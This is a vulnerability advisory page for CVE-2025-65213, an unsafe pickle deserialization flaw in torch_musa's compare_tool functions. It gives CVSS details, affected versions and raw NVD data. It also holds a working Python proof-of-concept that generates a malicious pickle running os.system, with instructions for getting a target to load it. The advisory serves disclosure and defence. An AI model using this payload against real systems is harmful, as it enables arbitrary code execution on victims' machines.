Security Vulnerability Report

CVE-2025-65213

Published: 2025-12-15 19:16:05
Last Modified: 2026-01-07 20:51:19

Description

MooreThreads torch_musa through all versions contains an unsafe deserialization vulnerability in torch_musa.utils.compare_tool. The compare_for_single_op() and nan_inf_track_for_single_op() functions use pickle.load() on user-controlled file paths without validation, allowing arbitrary code execution. An attacker can craft a malicious pickle file that executes arbitrary Python code when loaded, enabling remote code execution with the privileges of the victim process.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mthreads:torch_musa:*:*:*:*:*:*:*:* - VULNERABLE
MooreThreads torch_musa: all versions affected (the CPE match has no version bound, and no fixed release is listed)
torch_musa 1.0.0 (affected)
torch_musa 1.1.0 (affected)
torch_musa 1.2.0 (affected)
torch_musa 1.3.0 (affected)
torch_musa 1.4.0 (affected)
torch_musa 1.5.0 (affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
"""
CVE-2025-65213 PoC - Malicious pickle file generator

This PoC demonstrates the unsafe deserialization vulnerability in the
torch_musa.utils.compare_tool module.

Usage: generate the malicious pickle file, then trigger the vulnerability by
having the target application load this file through compare_for_single_op()
or nan_inf_track_for_single_op().
"""
import os
import pickle
import sys


class MaliciousPayload:
    """
    Malicious class that executes arbitrary code during unpickling.
    The __reduce__ method is called by pickle.load() to reconstruct the object.
    """

    def __reduce__(self):
        # This command will be executed on the target system.
        # Replace with any malicious command.
        cmd = "whoami > /tmp/pwned.txt"
        return (os.system, (cmd,))


def generate_malicious_pickle(output_path="malicious_compare.pkl"):
    """
    Generate a malicious pickle file that exploits CVE-2025-65213.

    Args:
        output_path: Path where the malicious pickle file will be saved
    """
    payload = MaliciousPayload()
    with open(output_path, "wb") as f:
        pickle.dump(payload, f)
    print(f"[+] Malicious pickle file generated: {output_path}")
    print("[+] When loaded by the vulnerable function, will execute: whoami > /tmp/pwned.txt")
    return output_path


def simulate_vulnerable_code(pickle_file_path):
    """
    Simulate the vulnerable code pattern found in torch_musa.utils.compare_tool.
    This demonstrates how the vulnerability can be triggered.
    """
    print("[*] Simulating vulnerable code execution...")
    print(f"[*] Loading file: {pickle_file_path}")
    # This is the vulnerable pattern from the affected code.
    with open(pickle_file_path, "rb") as f:
        # VULNERABLE: no validation of pickle file contents
        data = pickle.load(f)  # Arbitrary code executes here
    print("[+] File loaded successfully (code execution occurred)")
    return data


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "--generate":
        # Generate the malicious pickle file only.
        output_file = sys.argv[2] if len(sys.argv) > 2 else "malicious_compare.pkl"
        generate_malicious_pickle(output_file)
    else:
        # Demo mode: generate the file and print how to trigger the load
        # (for testing purposes only; this mode does not execute the payload).
        malicious_file = generate_malicious_pickle()
        print("\n[*] To exploit this vulnerability:")
        print(f"[*] 1. Get the target to call compare_for_single_op('{malicious_file}')")
        print(f"[*] 2. Or get the target to call nan_inf_track_for_single_op('{malicious_file}')")
```

References

https://github.com/MooreThreads/torch_musa/issues/110#issuecomment-3475809588 (tags: Exploit, Issue Tracking)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-65213", "sourceIdentifier": "[email protected]", "published": "2025-12-15T19:16:05.207", "lastModified": "2026-01-07T20:51:19.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MooreThreads torch_musa through all versions contains an unsafe deserialization vulnerability in torch_musa.utils.compare_tool. The compare_for_single_op() and nan_inf_track_for_single_op() functions use pickle.load() on user-controlled file paths without validation, allowing arbitrary code execution. An attacker can craft a malicious pickle file that executes arbitrary Python code when loaded, enabling remote code execution with the privileges of the victim process."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mthreads:torch_musa:*:*:*:*:*:*:*:*", "matchCriteriaId": "C9483B7D-B6A7-4C6B-A10C-F650C89482CB"}]}]}], "references": [{"url": "https://github.com/MooreThreads/torch_musa/issues/110#issuecomment-3475809588", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}
```